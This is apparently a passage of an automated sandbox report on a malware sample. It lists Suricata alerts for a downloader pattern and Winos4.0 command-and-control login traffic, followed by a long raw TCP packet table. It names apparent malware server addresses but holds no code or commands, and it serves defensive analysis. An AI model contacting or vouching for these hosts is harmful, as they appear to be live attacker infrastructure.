Translation	0x0804 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	China
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-13T10:50:32.795662+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49693	3.5.237.40	443	TCP
2025-03-13T10:50:42.878721+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49695	3.5.237.40	443	TCP
2025-03-13T10:50:47.118221+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49700	3.5.237.40	443	TCP
2025-03-13T10:50:50.731029+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49701	3.5.237.40	443	TCP
2025-03-13T10:50:54.498036+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49702	3.5.237.40	443	TCP
2025-03-13T10:50:57.728188+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49703	3.5.237.40	443	TCP
2025-03-13T10:51:39.992037+0100	2052875	ET MALWARE Winos4.0 Framework CnC Login Message	1	192.168.2.6	49705	206.238.115.224	4433	TCP
2025-03-13T10:51:56.151055+0100	2059975	ET MALWARE Winos4.0 Framework CnC Login Message CnC Server Response	1	206.238.115.224	4433	192.168.2.6	49705	TCP
2025-03-13T10:52:42.988497+0100	2052875	ET MALWARE Winos4.0 Framework CnC Login Message	1	192.168.2.6	49705	206.238.115.224	4433	TCP
2025-03-13T10:52:58.994834+0100	2059975	ET MALWARE Winos4.0 Framework CnC Login Message CnC Server Response	1	206.238.115.224	4433	192.168.2.6	49705	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 13, 2025 10:50:26.102016926 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:26.102065086 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:26.102153063 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:26.152426958 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:26.152442932 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:28.203392982 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:28.203502893 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:28.216792107 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:28.216811895 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:28.217184067 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:28.269716024 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:28.620464087 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:28.668318987 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.264353991 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.295418978 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.295437098 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.295463085 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.295481920 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.295490980 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.295516968 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:29.295535088 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.295608997 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:29.295720100 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:29.295727968 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.295909882 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:29.457386017 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.457422018 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.457469940 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.457473040 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:29.457495928 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.457578897 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:29.492444992 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.492486000 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.492572069 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:29.492592096 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.492604017 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:29.498085022 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.498150110 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:29.498162031 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.515685081 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.515738964 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.515788078 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:29.515801907 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.515887976 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:29.533008099 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.533379078 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:29.533405066 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.581990004 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:29.680017948 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.680043936 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.680075884 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.680105925 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.680129051 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:29.680151939 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.680197954 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:29.680197954 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:29.680210114 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.692468882 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.692507029 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.692636013 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:29.692658901 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.692684889 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:29.721096992 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.721129894 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.721220016 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:29.721240044 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.721281052 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:29.734627008 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.734668016 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.734724998 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:29.734739065 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.734756947 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:29.748059034 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.748085976 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.748147011 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:29.748157978 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.748214006 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:29.754976988 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.755065918 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:29.755075932 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.755274057 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:29.781770945 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.781799078 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.781842947 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:29.781853914 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.781864882 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.781919956 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:29.781919956 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:29.903971910 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.903995991 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.904031038 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.904056072 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:29.904088020 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.904145002 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:29.910043001 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.910064936 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.910110950 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:29.910121918 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.910159111 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:29.925750017 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.925766945 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.925856113 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:29.925868034 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.925879955 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:29.932008028 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.932029009 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.932075977 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:29.932096004 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.932126045 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:29.938822985 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.938838959 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.938951969 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:29.938962936 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.945657969 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.945678949 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.945724010 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:29.945736885 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.945775986 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:29.953136921 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.953154087 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.953236103 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:29.953250885 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.958837032 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.958897114 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.958973885 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:29.958996058 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.959008932 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:29.996547937 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.996601105 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.996639013 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:29.996671915 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:29.996747971 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:30.001627922 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:30.001718044 CET	443	49692	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:30.001724958 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:30.001804113 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:30.008781910 CET	49692	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:30.032438993 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:30.032489061 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:30.032589912 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:30.033843040 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:30.033854961 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:31.996151924 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:32.020432949 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:32.020458937 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:32.795675993 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:32.847551107 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:32.851124048 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:32.851140022 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:32.851161957 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:32.851186991 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:32.851193905 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:32.851195097 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:32.851207018 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:32.851248026 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:32.851283073 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:32.851283073 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:32.851291895 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:32.894479036 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.052196026 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.052211046 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.052263975 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.052270889 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.052321911 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.052320957 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.052320957 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.052342892 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.052355051 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.086844921 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.086888075 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.086963892 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.086982965 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.087028980 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.092813969 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.092879057 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.092888117 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.109946012 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.109973907 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.110066891 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.110076904 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.110197067 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.139000893 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.139022112 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.139120102 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.139120102 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.139131069 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.139203072 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.167630911 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.222522020 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.236812115 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.236821890 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.236845016 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.236941099 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.236941099 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.236953020 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.237157106 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.239563942 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.264535904 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.264552116 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.264683008 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.264683008 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.264693022 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.280358076 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.280392885 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.280447960 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.280456066 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.280493021 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.296089888 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.296108961 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.296643019 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.296649933 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.311949968 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.311970949 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.312078953 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.312078953 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.312088013 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.330866098 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.330883980 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.331079960 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.331088066 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.378766060 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.677294970 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.677309990 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.677342892 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.677362919 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.677402020 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.677403927 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.677413940 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.677494049 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.677494049 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.683739901 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.683748960 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.683775902 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.683806896 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.683851957 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.683857918 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.683871031 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.684001923 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.690208912 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.690227032 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.690267086 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.690310955 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.690315962 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.690418959 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.696751118 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.696783066 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.696844101 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.696851015 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.696969986 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.703156948 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.703181982 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.703269958 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.703269958 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.703277111 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.709686995 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.709714890 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.709774971 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.709779978 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.710011005 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.716059923 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.716078997 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.716326952 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.716326952 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.716334105 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.760646105 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.760689020 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.760795116 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.760804892 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.760842085 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.772167921 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.772183895 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.772361040 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.772371054 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.792779922 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.792817116 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.792892933 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.792896986 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.792912960 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.792973995 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.792989969 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.793005943 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.793005943 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.793009043 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.793024063 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.793090105 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.793118000 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.793123960 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.793334007 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.793353081 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.793432951 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.793432951 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.793447971 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.847664118 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.982125998 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.982153893 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.982201099 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:33.982285023 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.982285023 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:33.982310057 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.035119057 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.037853003 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.037872076 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.037898064 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.037942886 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.037980080 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.037990093 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.038009882 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.041944027 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.041975021 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.042082071 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.042088985 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.042117119 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.097925901 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.145749092 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.145766020 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.145804882 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.145836115 CET	443	49693	3.5.237.40	192.168.2.6
Mar 13, 2025 10:50:34.145934105 CET	49693	443	192.168.2.6	3.5.237.40
Mar 13, 2025 10:50:34.145947933 CET	443	49693	3.5.237.40	192.168.2.6
